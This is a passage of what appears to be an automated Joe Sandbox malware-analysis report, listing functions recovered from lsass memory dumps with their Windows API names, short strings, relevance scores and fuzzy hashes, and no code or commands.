                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 7f5c5d8e9470d66b957bfc8c1c3338b0ec93afe50deec6401467a33702c9d897
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: C2517832A11A028EEF58CB16F44CB292795F3D4BD8F518126DA9747B8CEB39DE418705
                                                          Function 000002D6F14E8818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 45405553451469b45eac78d0a27992a921ad8a96e017e10848fda10da5bbd544
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: 98314732611A419EEB14DF12F84CB2937A4F790BD8F158116AEAB47B99DB3CCE41CB04
                                                          Function 000002D6F151C0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: d16a780318cda608f8b86a1a574e3523fb1ef354d4efb62528e37e0558b37a0f
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: E6F06DE6311E8089EE108B24F84C7296370AB897E5F64121ACA6F46AE4CF2DCC48C300
                                                          Function 000002D6F151330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 7ead5fb1b129f62b4208d18be29186b9c682591ff5f1a5b2de3a9d28cb4facb0
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 8FF08CA2304FC086EA548B17B91C1196260BB58FD0F088032EE5F57F18CF3CC8458700
                                                          Function 000002D6F1515500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: 89d636a0aaf0305d3c2b750672473a3089241b624bb6adbf6f8c0a637c2c3dcb
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: 3602C876219B848AEB61CF55F49835AB7A1F3C57D4F100016EA8E97BA8DB7CC844CF40
                                                          Function 000002D6F1515B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: 3cf1d840d9dcf03ccab45b6317aed8e22d9a44c678f1cd2c9aaaf629766997cd
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 376198B6529E848AEA618F15F49C31AB7A1F3897C4F500216EA8E57FA4DB7CC941CF40
                                                          Function 000002D6F14F3934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: fde2b21e776fc07e25fd0f4d69b870269d16fc1e724c27e0e56a2b69d65337ab
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1411C272A18E005DFA581768F44E76910806BE83F4F491637AAB70FFEECB2C8D44C211
                                                          Function 000002D6F1524534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 6bf7b93cdd6d6b59f790cacbec3de3887d575f98c22ffbb4cbb491e375e5bb81
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 0B1170B3B10E9109FA541768F45E36911816B793F8F484626EAAF17EEACB2C8C458200
                                                          Function 000002D6F151AE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: 987f609ed5bf0ba5cc83df458c4046ed743a7fad4121f2e9117aa177a313dc53
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: 9A6159B7600B848AEB229FA5E44839D77A1F344BC8F144216EE5E27B99DB7CC995C700
                                                          Function 000002D6F14EA5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: f9c4f8e6206a8963f6a7b47ead92b620a722661ef74abdf4d243677e63d5d571
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 2E516B32100A808EEB64CB26A54C35877A1E7D5BD8F249217DA9B47FD9CB3CDE51CB11
                                                          Function 000002D6F151B1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 71a3230ece6bef7479f4e2890e5adf1a87b513b83bb6095f49a83735daaef3e4
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: E8515BB2200A808EEB668F21B58C35C76B0E355BC4F146217DA9EA7FD5CB3CD8A5C701
                                                          Function 000002D6F1513554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: 04b5bc7be5bae2e231b41602a3925eddeedc2558ddb853d7041854d0f4e41136
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: 24117FA1314F819AEB919F25F85D39A56A4F7447E0F9444629E4EA3F94EF2CCD04C740
                                                          Function 000002D6F1522488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: 87ea7e14d2d76aee394001ea6eb3b3dc7dbb72b68501625102b15bc11e301b5e
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: ECD1BEB7B04A808DE711CFA9E44829C37B1F3547D8F54421ADE5E9BF99DA38C84AC740
                                                          Function 000002D6F15114A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: 9d04490a5e2fbcb8dfec4f4e7dc08825bcd3f5b62e1391709303a6a03f8b2330
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 8E014C72600ED0CAD744DF66F84C24AA7A0F788FC0F144426EE4E53B19DE38D851C740
                                                          Function 000002D6F1522DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D6F1522D9B), ref: 000002D6F1522ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D6F1522D9B), ref: 000002D6F1522F57
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: 92e1807aa898a0b2b4613ca21d82bc4f10f96b9a7745d83c59c66e000c55cf7b
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: E6918CA7610E908DF7A09F65A48D7AD6BA0B744BC8F54411EDE0F67E99DA3CCC82C710
                                                          Function 000002D6F1517D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 06b4efff5b6c160b7dc9c4b7bd4f778f21c86f1fa3c020589f51172ef4ae19d9
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: 8F11E866710F448EEF008F60E8993A933A4F759798F441E26DE6E46BA4DB7CC5998380
                                                          Function 000002D6F14EA24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: 8d0a257d0caca75355a0c7b1b12a1f23c93301f2e9b2ee0cbe80525b15093ef4
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: D9615937604F848AEB20DF65E48839D77A0F384BC8F144216EF5A17B99DB78DA95C710
                                                          Function 000002D6F15123F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: a65ad775bb423b37c431d461dad3b794233cd1dd6003edd2ca36412c875c725d
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: 575107A6204B8189EA669F25B4AC36AA751F3857C0F66011BDE4F27F99DE3DCC44CB40
                                                          Function 000002D6F14F2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: d29dea122ef367423192d766315d926b2feafc5fa2c5c6954ae55b370387667b
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: E6614E21925F488CE6639B39B86D2256718BFA33C9F41D317E82B77F69DB1C98078200
                                                          Function 000002D6F1522B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: 3bb12b5c87f35b63ff020a461a0ba4d7719bd7d288c1a8db06b5396424dc50a6
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: 9141A0A7314E809ADB209F65F44C3AA67A1F7987D4F804026EE4E87B94DB7CC841CB40
                                                          Function 000002D6F15198D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
